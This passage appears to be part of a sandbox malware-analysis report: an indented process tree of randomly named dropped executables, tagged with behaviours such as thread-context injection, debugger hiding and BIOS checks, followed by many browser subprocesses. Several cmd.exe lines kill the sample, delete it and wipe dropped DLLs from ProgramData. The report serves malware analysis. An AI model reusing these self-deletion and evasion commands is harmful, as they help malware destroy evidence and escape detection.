                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                8⤵
                                                                • Checks whether UAC is enabled
                                                                • Drops file in Program Files directory
                                                                PID:8664
                                                              • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                8⤵
                                                                  PID:8656
                                                              • C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe
                                                                "C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:7816
                                                                • C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe
                                                                  "C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"
                                                                  8⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:6988
                                                              • C:\Users\Admin\Documents\jtW2SlgNdt8N1bR8cmz07mY3.exe
                                                                "C:\Users\Admin\Documents\jtW2SlgNdt8N1bR8cmz07mY3.exe"
                                                                7⤵
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:8084
                                                              • C:\Users\Admin\Documents\Tj3Ec2O1wj9zalzscQdK5sK5.exe
                                                                "C:\Users\Admin\Documents\Tj3Ec2O1wj9zalzscQdK5sK5.exe"
                                                                7⤵
                                                                  PID:8076
                                                                • C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe
                                                                  "C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe"
                                                                  7⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:8068
                                                                  • C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe
                                                                    C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe
                                                                    8⤵
                                                                      PID:9056
                                                                  • C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe
                                                                    "C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:7568
                                                                    • C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe
                                                                      "C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"
                                                                      8⤵
                                                                        PID:4428
                                                                    • C:\Users\Admin\Documents\rePWGAeA9gG8Y413QzXTBROs.exe
                                                                      "C:\Users\Admin\Documents\rePWGAeA9gG8Y413QzXTBROs.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:7560
                                                                    • C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe
                                                                      "C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks processor information in registry
                                                                      PID:7552
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im nRYNXU8kXWDM9ct7FinhQA1L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe" & del C:\ProgramData\*.dll & exit
                                                                        8⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3496
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /im nRYNXU8kXWDM9ct7FinhQA1L.exe /f
                                                                          9⤵
                                                                          • Kills process with taskkill
                                                                          PID:9312
                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                          timeout /t 6
                                                                          9⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:16752
                                                                    • C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe
                                                                      "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"
                                                                      7⤵
                                                                        PID:7540
                                                                        • C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe
                                                                          "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Checks processor information in registry
                                                                          PID:4088
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 30m_VqBd5yyKL_Q269RMiiX0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe" & del C:\ProgramData\*.dll & exit
                                                                            9⤵
                                                                              PID:7132
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im 30m_VqBd5yyKL_Q269RMiiX0.exe /f
                                                                                10⤵
                                                                                • Kills process with taskkill
                                                                                PID:11080
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                10⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:17592
                                                                        • C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe
                                                                          "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"
                                                                          7⤵
                                                                            PID:7528
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                              8⤵
                                                                                PID:4672
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                  9⤵
                                                                                    PID:8580
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                  8⤵
                                                                                  • Enumerates system info in registry
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5484
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd6dcfa380,0x7ffd6dcfa390,0x7ffd6dcfa3a0
                                                                                    9⤵
                                                                                      PID:9300
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1840 /prefetch:2
                                                                                      9⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:9748
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 /prefetch:8
                                                                                      9⤵
                                                                                        PID:8788
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 /prefetch:8
                                                                                        9⤵
                                                                                          PID:4972
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:1
                                                                                          9⤵
                                                                                            PID:6664
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
                                                                                            9⤵
                                                                                              PID:492
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
                                                                                              9⤵
                                                                                                PID:9368
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                                                                                9⤵
                                                                                                  PID:10284
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                                                                                  9⤵
                                                                                                    PID:10404
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                                                                                                    9⤵
                                                                                                      PID:10448
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:8
                                                                                                      9⤵
                                                                                                        PID:10660
                                                                                                      • C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel=stable --force-configure-user-settings
                                                                                                        9⤵
                                                                                                          PID:7060
                                                                                                          • C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff634e26ee0,0x7ff634e26ef0,0x7ff634e26f00
                                                                                                            10⤵
                                                                                                              PID:11696
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
                                                                                                            9⤵
                                                                                                              PID:11688
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4220 /prefetch:2
                                                                                                              9⤵
                                                                                                                PID:11852
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1984 /prefetch:8
                                                                                                                9⤵
                                                                                                                  PID:11828
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:8
                                                                                                                  9⤵
                                                                                                                    PID:4320
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3728 /prefetch:8
                                                                                                                    9⤵
                                                                                                                      PID:6440
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:8
                                                                                                                      9⤵
                                                                                                                        PID:4844
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:8
                                                                                                                        9⤵
                                                                                                                          PID:7084
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3932 /prefetch:8
                                                                                                                          9⤵
                                                                                                                            PID:12104
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:8
                                                                                                                            9⤵
                                                                                                                              PID:1004
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
                                                                                                                              9⤵
                                                                                                                                PID:11696
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 /prefetch:8
                                                                                                                                9⤵
                                                                                                                                  PID:9360
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
                                                                                                                                  9⤵
                                                                                                                                    PID:12400
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3744 /prefetch:8
                                                                                                                                    9⤵
                                                                                                                                      PID:11968
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3952 /prefetch:8
                                                                                                                                      9⤵
                                                                                                                                        PID:8752
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 /prefetch:8
                                                                                                                                        9⤵
                                                                                                                                          PID:12912
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3944 /prefetch:8
                                                                                                                                          9⤵
                                                                                                                                            PID:12192
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3908 /prefetch:8
                                                                                                                                            9⤵
                                                                                                                                              PID:12916
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6076 /prefetch:8
                                                                                                                                              9⤵
                                                                                                                                                PID:2204
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3872 /prefetch:8
                                                                                                                                                9⤵
                                                                                                                                                  PID:8392
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6468 /prefetch:8
                                                                                                                                                  9⤵
                                                                                                                                                    PID:7476
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1692 /prefetch:8
                                                                                                                                                    9⤵
                                                                                                                                                      PID:9936
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
                                                                                                                                                      9⤵
                                                                                                                                                        PID:12848
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6848 /prefetch:8
                                                                                                                                                        9⤵
                                                                                                                                                          PID:6208
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:8
                                                                                                                                                          9⤵
                                                                                                                                                            PID:11204
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6900 /prefetch:8
                                                                                                                                                            9⤵
                                                                                                                                                              PID:10452
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
                                                                                                                                                              9⤵
                                                                                                                                                                PID:9880
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3348 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:11636
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4352 /prefetch:8
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:17836
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:8
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:1464
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6880 /prefetch:8
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:18632
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6192 /prefetch:8
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:18688
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1964 /prefetch:8
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:18764
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7064 /prefetch:8
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:19052
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3808 /prefetch:8
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:19196
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3788 /prefetch:8
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:19120
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:13268
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:13040
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "cmd.exe" /C taskkill /F /PID 7528 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:9688
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        taskkill /F /PID 7528
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:10552
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "cmd.exe" /C taskkill /F /PID 7528 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:10916
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /PID 7528
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:12316
                                                                                                                                                                                    • C:\Users\Admin\Documents\1LmD_gnw4q8R9TJXTApySnvK.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\1LmD_gnw4q8R9TJXTApySnvK.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
